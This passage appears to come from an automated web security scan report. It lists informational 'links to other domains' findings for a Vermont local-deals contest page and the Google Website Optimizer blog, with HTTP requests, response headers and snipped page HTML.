       <script src="http://vermontopia.com/scripts/loadtheme.js" language="javascript" type="text/javascript"></script>
       <script src="http://vermontopia.com/scripts/advancedsearch.js" language="javascript" type="text/javascript"></script>
       <script src="http://vermontopia.com/scripts/contactclick.js" language="javascript" type="text/javascript"></script>
       <script src="http://vermontopia.com/scripts/cookies.js" language="javascript" type="text/javascript"></script>


                               <script src="http://vermontopia.com/scripts/jquery.js" language="javascript" type="text/javascript">$.preloadCssImages();</script>
<script src="http://vermontopia.com/scripts/jquery/jquery.cookie.js" type="text/javascript"></script>
               <script src="http://vermontopia.com/scripts/jquery/jquery.autocomplete.js" type="text/javascript"></script>
       <link href="http://vermontopia.com/scripts/jquery/jquery.autocomplete.css" rel="stylesheet" type="text/css" media="all" />
        <script type="text/javascript" src="http://vermontopia.com/scripts/jquery/jcrop/js/jquery.Jcrop.js"></script>
<link rel="stylesheet" href="http://vermontopia.com/scripts/jquery/jcrop/css/jquery.Jcrop.css" type="text/css" />
               <script src="http://vermontopia.com/scripts/jquery/jquery.thickbox.js" type="text/javascript"></script>
       <link href="http://vermontopia.com/scripts/jquery/thickbox/thickbox.css" rel="stylesheet" type="text/css" media="all" />
               <script type="text/javascript" src="http://vermontopia.com/scripts/jquery/jquery.selectbox.js"></script>
       <script src="http://vermontopia.com/scripts/review.js" language="javascript" type="text/javascript"></script>
        <link type="text/css" href="http://vermontopia.com/scripts/jquery/jquery_ui/css/smoothness/jquery-ui-1.7.2.custom.css" rel="stylesheet" />
<script type="text/javascript" src="http://vermontopia.com/scripts/jquery/jquery_ui/js/jquery-ui-1.7.2.custom.min.js"></script>

       <script language="javascript" type="text/javascript" src="http://vermontopia.com/scripts/checkusername.js"></script>
       <script language="javascript" type="text/javascript" src="http://vermontopia.com/scripts/socialbookmarking.js"></script>
...[SNIP]...
</head>

   <script src="http://maps.google.com/maps?file=api&amp;v=2&amp;sensor=true&amp;key=ABQIAAAAC-ql6H5r1qnVMqxBP63Z8hQw1gWJNEO1Cn5TQmwHwmBmp3h6FhQGIzG5Agxz3d54vos97_OkOX6cZA" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://vermontopia.com/profile/login.php?destiny=http://vermontopia.com/profile/&keepThis=true&width=250&height=345&modal=true" class="thickbox">Sign In</a>
...[SNIP]...
<li><a href="http://vermontopia.com/profile/add.php">Add a Profile!</a>
...[SNIP]...
<h1 class="logo"><a href="http://vermontopia.com/index.php" target="_parent" title="vermontopia.com" ><span>
...[SNIP]...
<li id="TM0"><a href="http://vermontopia.com/index.php">Home</a>
...[SNIP]...
<li id="TM1" ><a href="http://vermontopia.com/business/">Businesses</a>
...[SNIP]...
<li id="TM2" ><a href="http://vermontopia.com/event/">Events</a>
...[SNIP]...
<li id="TM3" ><a href="http://vermontopia.com/classified/">Classifieds</a>
...[SNIP]...
<li id="TM4" ><a href="http://vermontopia.com/article/">Articles</a>
...[SNIP]...
<li id="TM5" ><a href="http://vermontopia.com/coupon/">Coupons</a>
...[SNIP]...
<li ><a href="http://vermontopia.com/blog/index.php">Blog</a>
...[SNIP]...
<li id="TM6" ><a href="http://vermontopia.com/advertise.php">Join</a>
...[SNIP]...
<li id="TM7" ><a href="http://vermontopia.com/contactus.php">Contact Us</a>
...[SNIP]...
</div>
<script type="text/javascript" src="https://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
</a>
<a href="http://twitter.com/home?status=Blue+Morpho+Technologies+-+One-hour+tech+visit+for+just+%2425+(normally+%2455%3b+one+hour+minimum+required):+http%3a%2f%2fupickem.net%2f536aEQqHYL6%3fr%3d883744" title="Add to Twitter" target="_blank" style="display:inline;background-color:inherit;background-image:url('');"><img src="images/twitternew.png" border="0" style="vertical-align:middle;display:inline;padding:0px;margin:0px;background-color:inherit;background-image:url('');" />
...[SNIP]...
<td align="center" style="text-align: center;">
<img src="http://blackpearl.wcax.com/Jumpon-It/Clients/Logos/bluemorpho-Main.jpg" border="0" class="UPE-DealImageFull" ><div class="UPE-Space3">
...[SNIP]...
<br><a href="http://www.bluemorph.com" target="_blank" class="UPE-Link">www.bluemorph.com</a>
...[SNIP]...
<br><iframe src="http://www.facebook.com/plugins/likebox.php?id=230427970205&amp;width=300&amp;connections=10&amp;stream=true&amp;header=true&amp;height=350" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:350px;" allowTransparency="true"></iframe>
...[SNIP]...
</h1>&nbsp;&nbsp;&nbsp;
Powered by &copy;
<a href="http://www.deadlinedeals.com" class="UPE-CopyrightText" target="DeadlineDeals">Deadline Deals</a>
...[SNIP]...
<li id="FM1_0"><a href="http://vermontopia.com/index.php">Home</a>
...[SNIP]...
<li id="FM1_1"><a href="http://vermontopia.com/advertise.php">Join</a>
...[SNIP]...
<li id="FM1_2"><a href="http://vermontopia.com/faq.php">FAQ</a>
...[SNIP]...
<li id="FM1_3"><a href="http://vermontopia.com/sitemap.php">Sitemap</a>
...[SNIP]...
<li id="FM1_4"><a href="http://vermontopia.com/contactus.php">Contact Us</a>
...[SNIP]...
<li id="FM2_0"><a href="http://vermontopia.com/business/">Businesses</a>
...[SNIP]...
<li id="FM2_1"><a href="http://vermontopia.com/event/">Events</a>
...[SNIP]...
<li id="FM2_2"><a href="http://vermontopia.com/classified/">Classifieds</a>
...[SNIP]...
<li id="FM2_3"><a href="http://vermontopia.com/article/">Articles</a>
...[SNIP]...
<li id="FM2_4"><a href="http://vermontopia.com/coupon/">Coupons</a>
...[SNIP]...
<li><a href="http://vermontopia.com/blog/">Blog</a>
...[SNIP]...
10.175. http://wcax.upickem.net/engine/Splash.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wcax.upickem.net
Path:   /engine/Splash.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /engine/Splash.aspx?contestid=17178 HTTP/1.1
Host: wcax.upickem.net
Proxy-Connection: keep-alive
Referer: http://www.vermontopia.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
Set-Cookie: contestid=17178; expires=Tue, 09-Apr-2041 12:31:11 GMT; path=/
Set-Cookie: UPETemporaryShoppingCartID17178=36497604-4/9/2011 8:31:11 AM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: 293976; expires=Tue, 09-Apr-2041 12:31:11 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID CUR PSDa OUR STP STA"
Date: Sat, 09 Apr 2011 12:31:11 GMT
Content-Length: 39215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<meta name="ROBOTS" content="index, follow" />

                   <link href="http://vermontopia.com/layout/general_structure.css" rel="stylesheet" type="text/css" media="all" />
           <link href="http://vermontopia.com/layout/general_dynamic.php" rel="stylesheet" type="text/css" media="all" />
                   <link href="http://vermontopia.com/custom/content_files/noimage.css" rel="stylesheet" type="text/css" media="all" />
       <script type="text/javascript">
...[SNIP]...
</script>

       <script src="http://vermontopia.com/scripts/lang.js.php" language="javascript" type="text/javascript"></script>
       <script src="http://vermontopia.com/scripts/common.js" language="javascript" type="text/javascript"></script>
       <script src="http://vermontopia.com/scripts/location.js" language="javascript" type="text/javascript"></script>
       <script src="http://vermontopia.com/scripts/loadtheme.js" language="javascript" type="text/javascript"></script>
       <script src="http://vermontopia.com/scripts/advancedsearch.js" language="javascript" type="text/javascript"></script>
       <script src="http://vermontopia.com/scripts/contactclick.js" language="javascript" type="text/javascript"></script>
       <script src="http://vermontopia.com/scripts/cookies.js" language="javascript" type="text/javascript"></script>


                               <script src="http://vermontopia.com/scripts/jquery.js" language="javascript" type="text/javascript">$.preloadCssImages();</script>
<script src="http://vermontopia.com/scripts/jquery/jquery.cookie.js" type="text/javascript"></script>
               <script src="http://vermontopia.com/scripts/jquery/jquery.autocomplete.js" type="text/javascript"></script>
       <link href="http://vermontopia.com/scripts/jquery/jquery.autocomplete.css" rel="stylesheet" type="text/css" media="all" />
        <script type="text/javascript" src="http://vermontopia.com/scripts/jquery/jcrop/js/jquery.Jcrop.js"></script>
<link rel="stylesheet" href="http://vermontopia.com/scripts/jquery/jcrop/css/jquery.Jcrop.css" type="text/css" />
               <script src="http://vermontopia.com/scripts/jquery/jquery.thickbox.js" type="text/javascript"></script>
       <link href="http://vermontopia.com/scripts/jquery/thickbox/thickbox.css" rel="stylesheet" type="text/css" media="all" />
               <script type="text/javascript" src="http://vermontopia.com/scripts/jquery/jquery.selectbox.js"></script>
       <script src="http://vermontopia.com/scripts/review.js" language="javascript" type="text/javascript"></script>
        <link type="text/css" href="http://vermontopia.com/scripts/jquery/jquery_ui/css/smoothness/jquery-ui-1.7.2.custom.css" rel="stylesheet" />
<script type="text/javascript" src="http://vermontopia.com/scripts/jquery/jquery_ui/js/jquery-ui-1.7.2.custom.min.js"></script>

       <script language="javascript" type="text/javascript" src="http://vermontopia.com/scripts/checkusername.js"></script>
       <script language="javascript" type="text/javascript" src="http://vermontopia.com/scripts/socialbookmarking.js"></script>
...[SNIP]...
</head>

   <script src="http://maps.google.com/maps?file=api&amp;v=2&amp;sensor=true&amp;key=ABQIAAAAC-ql6H5r1qnVMqxBP63Z8hQw1gWJNEO1Cn5TQmwHwmBmp3h6FhQGIzG5Agxz3d54vos97_OkOX6cZA" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://vermontopia.com/profile/login.php?destiny=http://vermontopia.com/profile/&keepThis=true&width=250&height=345&modal=true" class="thickbox">Sign In</a>
...[SNIP]...
<li><a href="http://vermontopia.com/profile/add.php">Add a Profile!</a>
...[SNIP]...
<h1 class="logo"><a href="http://vermontopia.com/index.php" target="_parent" title="vermontopia.com" ><span>
...[SNIP]...
<li id="TM0"><a href="http://vermontopia.com/index.php">Home</a>
...[SNIP]...
<li id="TM1" ><a href="http://vermontopia.com/business/">Businesses</a>
...[SNIP]...
<li id="TM2" ><a href="http://vermontopia.com/event/">Events</a>
...[SNIP]...
<li id="TM3" ><a href="http://vermontopia.com/classified/">Classifieds</a>
...[SNIP]...
<li id="TM4" ><a href="http://vermontopia.com/article/">Articles</a>
...[SNIP]...
<li id="TM5" ><a href="http://vermontopia.com/coupon/">Coupons</a>
...[SNIP]...
<li ><a href="http://vermontopia.com/blog/index.php">Blog</a>
...[SNIP]...
<li id="TM6" ><a href="http://vermontopia.com/advertise.php">Join</a>
...[SNIP]...
<li id="TM7" ><a href="http://vermontopia.com/contactus.php">Contact Us</a>
...[SNIP]...
</div>
<script type="text/javascript" src="https://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
</a>
<a href="http://twitter.com/home?status=Blue+Morpho+Technologies+-+One-hour+tech+visit+for+just+%2425+(normally+%2455%3b+one+hour+minimum+required):+http%3a%2f%2fupickem.net%2f536aEQqHYL6%3fr%3d231682" title="Add to Twitter" target="_blank" style="display:inline;background-color:inherit;background-image:url('');"><img src="images/twitternew.png" border="0" style="vertical-align:middle;display:inline;padding:0px;margin:0px;background-color:inherit;background-image:url('');" />
...[SNIP]...
<td align="center" style="text-align: center;">
<img src="http://blackpearl.wcax.com/Jumpon-It/Clients/Logos/bluemorpho-Main.jpg" border="0" class="UPE-DealImageFull" ><div class="UPE-Space3">
...[SNIP]...
<br><a href="http://www.bluemorph.com" target="_blank" class="UPE-Link">www.bluemorph.com</a>
...[SNIP]...
<br><iframe src="http://www.facebook.com/plugins/likebox.php?id=230427970205&amp;width=300&amp;connections=10&amp;stream=true&amp;header=true&amp;height=350" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:350px;" allowTransparency="true"></iframe>
...[SNIP]...
</h1>&nbsp;&nbsp;&nbsp;
Powered by &copy;
<a href="http://www.deadlinedeals.com" class="UPE-CopyrightText" target="DeadlineDeals">Deadline Deals</a>
...[SNIP]...
<li id="FM1_0"><a href="http://vermontopia.com/index.php">Home</a>
...[SNIP]...
<li id="FM1_1"><a href="http://vermontopia.com/advertise.php">Join</a>
...[SNIP]...
<li id="FM1_2"><a href="http://vermontopia.com/faq.php">FAQ</a>
...[SNIP]...
<li id="FM1_3"><a href="http://vermontopia.com/sitemap.php">Sitemap</a>
...[SNIP]...
<li id="FM1_4"><a href="http://vermontopia.com/contactus.php">Contact Us</a>
...[SNIP]...
<li id="FM2_0"><a href="http://vermontopia.com/business/">Businesses</a>
...[SNIP]...
<li id="FM2_1"><a href="http://vermontopia.com/event/">Events</a>
...[SNIP]...
<li id="FM2_2"><a href="http://vermontopia.com/classified/">Classifieds</a>
...[SNIP]...
<li id="FM2_3"><a href="http://vermontopia.com/article/">Articles</a>
...[SNIP]...
<li id="FM2_4"><a href="http://vermontopia.com/coupon/">Coupons</a>
...[SNIP]...
<li><a href="http://vermontopia.com/blog/">Blog</a>
...[SNIP]...
10.176. http://websiteoptimizer.blogspot.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteoptimizer.blogspot.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?utm_source=gwohp&utm_medium=et&utm_campaign=promobox HTTP/1.1
Host: websiteoptimizer.blogspot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Sat, 09 Apr 2011 00:17:48 GMT
Date: Sat, 09 Apr 2011 00:17:48 GMT
Last-Modified: Fri, 08 Apr 2011 21:37:44 GMT
ETag: "e0213802-228e-4449-8f65-4ab86d03d39b"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate
Age: 0
Content-Length: 74361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmln
...[SNIP]...
<meta content='blogger' name='generator'/>
<link href='http://www.blogger.com/favicon.ico' rel='icon' type='image/vnd.microsoft.icon'/>
<link href='http://websiteoptimizer.blogspot.com/' rel='canonical'/>
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Official Google Website Optimizer Blog - RSS" href="http://websiteoptimizer.blogspot.com/feeds/posts/default?alt=rss" />
<link rel="service.post" type="application/atom+xml" title="Official Google Website Optimizer Blog - Atom" href="http://www.blogger.com/feeds/36315330/posts/default" />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.blogger.com/rsd.g?blogID=36315330" />
<link rel="me" href="http://www.blogger.com/profile/17289811723797030215" />
<link rel="openid.server" href="http://www.blogger.com/openid-server.g" />
<!--[if IE]>
...[SNIP]...
</title>
<link href='http://www2.blogger.com/widgets/3319451950-blogarchive.css' rel='stylesheet' type='text/css'/><link href='http://www2.blogger.com/widgets/2791266615-blog.css' rel='stylesheet' type='text/css'/><!-- --><link type='text/css' rel='stylesheet' href='http://www.blogger.com/static/v1/widgets/987282334-widget_css_bundle.css' />
<link rel="stylesheet" type="text/css" href="http://www.blogger.com/dyn-css/authorization.css?targetBlogID=36315330&zx=e0213802-228e-4449-8f65-4ab86d03d39b"/>
<style type="text/css">
...[SNIP]...
</style>
<link href='http://www.google.com/uds/css/gsearch.css' rel='stylesheet' type='text/css'/>
<style id='page-skin-1' type='text/css'>
...[SNIP]...
</style>
<script src='http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAA8oTp_KDiJ7gFvDuWWFfolxSsjpG0v6LKZNJMgOfcl5DRgehOGRS3tdb0znEuzRx4n3POfAbiiP1VSw' type='text/javascript'></script>
...[SNIP]...
</script>
<iframe src="http://www.blogger.com/navbar.g?targetBlogID=36315330&amp;blogName=Official+Google+Website+Optimizer+Blog&amp;publishMode=PUBLISH_MODE_BLOGSPOT&amp;navbarType=BLUE&amp;layoutType=LAYOUTS&amp;searchRoot=http%3A%2F%2Fwebsiteoptimizer.blogspot.com%2Fsearch&amp;blogLocale=en_US&amp;homepageUrl=http%3A%2F%2Fwebsiteoptimizer.blogspot.com%2F" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" height="30px" width="100%" id="navbar-iframe" allowtransparency="true" title="Blogger Navigation and Search"></iframe>
...[SNIP]...
<div style="text-align: center;"><a href="https://lh3.googleusercontent.com/_Zj7Xn8xapy0/TXgBgib4XsI/AAAAAAAABGg/E2UBwE3VMLU/s800/UTI%20Old%20Page.png"><img src="https://lh3.googleusercontent.com/_Zj7Xn8xapy0/TXgBgib4XsI/AAAAAAAABGg/E2UBwE3VMLU/s400/UTI%20Old%20Page.png" /></a>
...[SNIP]...
<br /><a href="https://lh4.googleusercontent.com/_Zj7Xn8xapy0/TXgBghHBeYI/AAAAAAAABGc/stb772_fPX0/s800/UTI%20-%20New%20Landing%20Page.PNG"></a><a href="https://lh4.googleusercontent.com/_Zj7Xn8xapy0/TXgBghHBeYI/AAAAAAAABGc/stb772_fPX0/s800/UTI%20-%20New%20Landing%20Page.PNG"><img src="https://lh4.googleusercontent.com/_Zj7Xn8xapy0/TXgBghHBeYI/AAAAAAAABGc/stb772_fPX0/s400/UTI%20-%20New%20Landing%20Page.PNG" /></a>
...[SNIP]...
<span class="Apple-style-span"><a href="https://lh4.googleusercontent.com/_Zj7Xn8xapy0/TXgBghHBeYI/AAAAAAAABGc/stb772_fPX0/s800/UTI%20-%20New%20Landing%20Page.PNG"></a>
...[SNIP]...
<div style="text-align: center;"><img src="https://lh3.googleusercontent.com/_Zj7Xn8xapy0/TXgAtpS4SzI/AAAAAAAABGU/VC7iNdur49Q/s400/uti-flow-chart.png" /><br />
...[SNIP]...
<span class='item-action'>
<a href='http://www.blogger.com/email-post.g?blogID=36315330&postID=5286778452913730559' title='Email Post'>
<img alt='' class='icon-action' src='http://www.blogger.com/img/icon18_email.gif'/>
</a>
</span>
<span class='item-control blog-admin pid-1990706769'>
<a href='http://www.blogger.com/post-edit.g?blogID=36315330&postID=5286778452913730559' title='Edit Post'>
<img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/>
</a>
...[SNIP]...
<li>If you <a href="http://www.google.com/support/websiteoptimizer/bin/answer.py?&amp;answer=140486">customize your Control Scripts</a> (for experiments with <a href="http://www.google.com/support/websiteoptimizer/bin/answer.py?hl=en&amp;answer=151978">cross-domain experiments</a>
...[SNIP]...
<li>Articles in the <a href="http://www.google.com/support/websiteoptimizer/">Help Center</a> have been updated to reflect the new tags though we still have <a href="http://www.google.com/support/websiteoptimizer/bin/answer.py?hl=en&amp;answer=117912">articles with the traditional tag</a>
...[SNIP]...
<span class='item-action'>
<a href='http://www.blogger.com/email-post.g?blogID=36315330&postID=5866992653008409736' title='Email Post'>
<img alt='' class='icon-action' src='http://www.blogger.com/img/icon18_email.gif'/>
</a>
</span>
<span class='item-control blog-admin pid-1990706769'>
<a href='http://www.blogger.com/post-edit.g?blogID=36315330&postID=5866992653008409736' title='Edit Post'>
<img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/>
</a>
...[SNIP]...
ions, government agencies, and non-profit organizations around the world. You can learn more about how Google Apps can lower IT costs and improve productivity and collaboration at your organization at <a href="http://www.google.com/apps">google.com/apps</a>
...[SNIP]...
<div>For those users who have a Google Apps account, if your administrator has already transitioned your organization to the new infrastructure, you can get started using Google Website Optimizer at <a href="http://www.google.com/websiteoptimizer">google.com/websiteoptimizer</a>
...[SNIP]...
<span class='item-action'>
<a href='http://www.blogger.com/email-post.g?blogID=36315330&postID=6554999656267137012' title='Email Post'>
<img alt='' class='icon-action' src='http://www.blogger.com/img/icon18_email.gif'/>
</a>
</span>
<span class='item-control blog-admin pid-1990706769'>
<a href='http://www.blogger.com/post-edit.g?blogID=36315330&postID=6554999656267137012' title='Edit Post'>
<img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/>
</a>
...[SNIP]...
<div>Instructions for both methods are available here at the <a href="http://www.google.com/support/websiteoptimizer/bin/answer.py?hl=en&amp;answer=1083131">Website Optimizer Help Center</a>
...[SNIP]...
<span class='item-action'>
<a href='http://www.blogger.com/email-post.g?blogID=36315330&postID=2754511111903595734' title='Email Post'>
<img alt='' class='icon-action' src='http://www.blogger.com/img/icon18_email.gif'/>
</a>
</span>
<span class='item-control blog-admin pid-1990706769'>
<a href='http://www.blogger.com/post-edit.g?blogID=36315330&postID=2754511111903595734' title='Edit Post'>
<img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/>
</a>
...[SNIP]...
<div>A <a href="http://bit.ly/lyndaGWO">new online video training course</a>
...[SNIP]...
</i>, and it's created by David Booth of <a href="http://www.websharedesign.com/">WebShare</a>, one of our <a href="http://www.google.com/websiteoptimizer/woac.html">Website Optimizer Certified Partners</a> and <a href="http://seminars.websharedesign.com/">Seminars for Success Leaders</a>
...[SNIP]...
<div>The course itself is available both <a href="http://bit.ly/lyndaGWO">online</a> and <a href="http://bit.ly/GWOlyndaDVD">on DVD</a>
...[SNIP]...
<param name="allowscriptaccess" value="always"><embed src="http://www.youtube.com/v/BXKQ0elgHdY?fs=1&amp;hl=en_US&amp;rel=0&amp;hd=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="560" height="340"></embed>
...[SNIP]...
<div>Well, we like things that make it even easier to use Google Website Optimizer in even more effective ways, so thanks Dave. You can <a href="http://bit.ly/lyndaGWO">find the course at lynda.com</a>
...[SNIP]...
<span class='item-action'>
<a href='http://www.blogger.com/email-post.g?blogID=36315330&postID=1687304504470394910' title='Email Post'>
<img alt='' class='icon-action' src='http://www.blogger.com/img/icon18_email.gif'/>
</a>
</span>
<span class='item-control blog-admin pid-1990706769'>
<a href='http://www.blogger.com/post-edit.g?blogID=36315330&postID=1687304504470394910' title='Edit Post'>
<img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/>
</a>
...[SNIP]...
<div>In less than two weeks, <a href="http://www.conversionconference.com/east/home.html">Conversion Conference East</a>
...[SNIP]...
<div>Conversion rate optimization is still a young discipline in the world of interactive marketing. The event was founded by Tim Ash, president of <a href="http://sitetuners.com/">Site Tuners</a>
...[SNIP]...
</i> when registering at the <a href="http://www.conversionconference.com/east/home.html">Conversion Conference site</a>
...[SNIP]...
<span class='item-action'>
<a href='http://www.blogger.com/email-post.g?blogID=36315330&postID=3218100963810246907' title='Email Post'>
<img alt='' class='icon-action' src='http://www.blogger.com/img/icon18_email.gif'/>
</a>
</span>
<span class='item-control blog-admin pid-1990706769'>
<a href='http://www.blogger.com/post-edit.g?blogID=36315330&postID=3218100963810246907' title='Edit Post'>
<img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/>
</a>
...[SNIP]...
<i>This guest post was contributed by <a href="http://twitter.com/danielwaisberg">Daniel Waisberg</a>, the Founder and Editor of <a href="http://online-behavior.com/">Online Behavior</a>
...[SNIP]...
ur customers like, which ultimately will help us create a better customer experience for our audience. But "our audience" is usually not a unique type of person; it is important use techniques such as <a href="http://online-behavior.com/testing/test-segmentation-234">Test Segmentation</a>
...[SNIP]...
fic is limited for most sites, so it is important to run tests that have a high chance of making a difference. We have to focus our efforts on our best guesses. In this post, we will show a way to use <a href="http://www.google.com/adplanner">DoubleClick Ad Planner</a>
...[SNIP]...
<br />So, let's suppose I am working to optimize the <a href="http://www.emetrics.org/">eMetrics Summit</a>
...[SNIP]...
<li>Geography: chose country USA and refined it to include only West Coast states. That's the main target for this show since eMetrics also hosts a <a href="http://www.emetrics.org/washingtondc/">Washington DC conference</a>
...[SNIP]...
<li>Online Activity: chose a large website that the audience is likely to visit: <a href="http://www.google.com/analytics">Google Analytics</a>
...[SNIP]...
<li>First of all, looks like <a href="http://www.jimsterne.com/">Jim Sterne</a>
...[SNIP]...
g for your audience and which sites they visit, you can also look into your competitors' sites and understand which segments they are attracting that you are not. Read more about it on Avinash's post: <a href="http://www.kaushik.net/avinash/2008/08/competitive-intelligence-analysis-google-ad-planner.html">Competitive Intelligence Analysis: Google / DoubleClick Ad Planner</a>
...[SNIP]...
<span class='item-action'>
<a href='http://www.blogger.com/email-post.g?blogID=36315330&postID=6958420735674919080' title='Email Post'>
<img alt='' class='icon-action' src='http://www.blogger.com/img/icon18_email.gif'/>
</a>
</span>
<span class='item-control blog-admin pid-1990706769'>
<a href='http://www.blogger.com/post-edit.g?blogID=36315330&postID=6958420735674919080' title='Edit Post'>
<img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/>
</a>
...[SNIP]...
<a href="http://websiteoptimizer.blogspot.com/atom.xml"><img src="http://www.google.com/images/feed-icon.gif"/></a>
...[SNIP]...
<br/>
<a href="http://fusion.google.com/add?feedurl=http%3A//websiteoptimizer.blogspot.com/atom.xml"><img border="0" alt="Add to Google" style="padding-top:5px;" width="104" src="http://buttons.googlesyndication.com/fusion/add.gif" height="17"/></a>
<br/>
<a href="http://feeds.feedburner.com/OfficialGoogleWebsiteOptimizerBlog"><img width="88" style="border:0" alt="" src="http://feeds.feedburner.com/~fc/OfficialGoogleWebsiteOptimizerBlog?bg=3300CC&amp;fg=FFFFFF&amp;anim=0" height="26"/></a>
...[SNIP]...
<span class='item-control blog-admin'>
<a class='quickedit' href='http://www.blogger.com/rearrange?blogID=36315330&widgetType=HTML&widgetId=HTML4&action=editWidget&sectionId=sidebar' onclick='return _WidgetManager._PopupConfig(document.getElementById("HTML4"));' target='configHTML4' title='Edit'>
<img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
...[SNIP]...
<span class='item-control blog-admin'>
<a class='quickedit' href='http://www.blogger.com/rearrange?blogID=36315330&widgetType=BlogArchive&widgetId=BlogArchive1&action=editWidget&sectionId=sidebar' onclick='return _WidgetManager._PopupConfig(document.getElementById("BlogArchive1"));' target='configBlogArchive1' title='Edit'>
<img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
...[SNIP]...
<span class='item-control blog-admin'>
<a class='quickedit' href='http://www.blogger.com/rearrange?blogID=36315330&widgetType=Image&widgetId=Image1&action=editWidget&sectionId=sidebar' onclick='return _WidgetManager._PopupConfig(document.getElementById("Image1"));' target='configImage1' title='Edit'>
<img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
...[SNIP]...
<li><a href='http://www.google.com/websiteoptimizer'>Website Optimizer Website</a>
...[SNIP]...
<li><a href='http://www.google.com/support/websiteoptimizer'>Website Optimizer Help Center</a>
...[SNIP]...
<li><a href='http://www.google.com/support/forum/p/websiteoptimizer?hl=en'>Website Optimizer Help Forum</a>
...[SNIP]...
<li><a href='http://www.google.com/intl/en/websiteoptimizer/partners.html'>GWO Authorized Consultants</a>
...[SNIP]...
<li><a href='http://www.youtube.com/websiteoptimizer'>GWO YouTube Channel</a>
...[SNIP]...
<li><a href='http://www.google.com/websiteoptimizer/techieguide'>Techie Guide for Website Optimizer (PDF)</a>
...[SNIP]...
<li><a href='http://www.gwotricks.com/'>GWO Tricks</a>
...[SNIP]...
<span class='item-control blog-admin'>
<a class='quickedit' href='http://www.blogger.com/rearrange?blogID=36315330&widgetType=LinkList&widgetId=LinkList1&action=editWidget&sectionId=sidebar' onclick='return _WidgetManager._PopupConfig(document.getElementById("LinkList1"));' target='configLinkList1' title='Edit'>
<img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
...[SNIP]...
<li><a href='http://www.kaushik.net/avinash/' rel='nofollow'>Avinash Kaushik's Blog</a>
...[SNIP]...
<li><a href='http://www.conversion-rate-experts.com/blog/' rel='nofollow'>Conversion Rate Experts Blog</a>
...[SNIP]...
<li><a href='http://www.epikone.com/blog/tag/website-optimizer' rel='nofollow'>EpikOne Blog</a>
...[SNIP]...
<li><a href='http://www.grokdotcom.com/' rel='nofollow'>Future Now Blog</a>
...[SNIP]...
<li><a href='http://www.lunametrics.com/blog/' rel='nofollow'>Lunametrics Blog</a>
...[SNIP]...
<li><a href='http://online-behavior.com/' rel='nofollow'>Online Behavior</a>
...[SNIP]...
<li><a href='http://www.roirevolution.com/blog/' rel='nofollow'>ROI Revolution Blog</a>
...[SNIP]...
